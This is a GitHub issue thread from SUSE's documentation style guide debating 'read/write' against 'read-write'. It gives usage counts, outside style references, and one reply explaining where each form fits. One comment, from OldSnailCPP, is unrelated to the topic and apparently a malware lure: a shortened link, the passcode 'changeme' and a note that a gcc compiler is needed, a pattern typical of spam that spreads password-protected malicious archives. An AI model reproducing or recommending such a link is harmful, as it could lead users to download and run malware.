### ISSUE TITLE
read/write or read-write?

### ISSUE THREAD

**Issue by dariavladykina** [SUSE/doc-styleguide#303]
Let's fix the spelling of 'read/write' or 'read-write'.
In `doc-sle`, we have: 
read/write: 18
read-write: 30

In `doc-modular`:
read/write: 7
read-write: 38

In [Google Trends](https://trends.google.com/trends/explore?date=today%205-y&q=read%2Fwrite,read-write&hl=en), 'read/write' is far ahead of 'read-write'.

[Microsoft](https://learn.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/r/read-write-read-write-permission) uses 'read/write', and so do Apple and [IATE](https://iate.europa.eu/search/result/1725541641255/1).

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by PadraigDillon1** [comment]
There could be a need for both. I did some here's some detail:
Read/Write
Read/Write Operations: This term is often used to describe the actions of reading from and writing to a storage medium or memory. For example, “The program performs read/write operations on the file.”
Permissions: In the context of file systems and permissions, read/write indicates that a user or process has both read and write access to a file or directory. For example, “The file has read/write permissions.”

Read-Write
Memory Types: This term is commonly used to describe types of memory or storage that can be both read from and written to. For example, “Read-write memory (RWM) is a type of memory that allows data to be read and written.”
Attributes: It can also describe the nature of a resource or attribute. For example, “The database field is read-write, meaning it can be modified.”
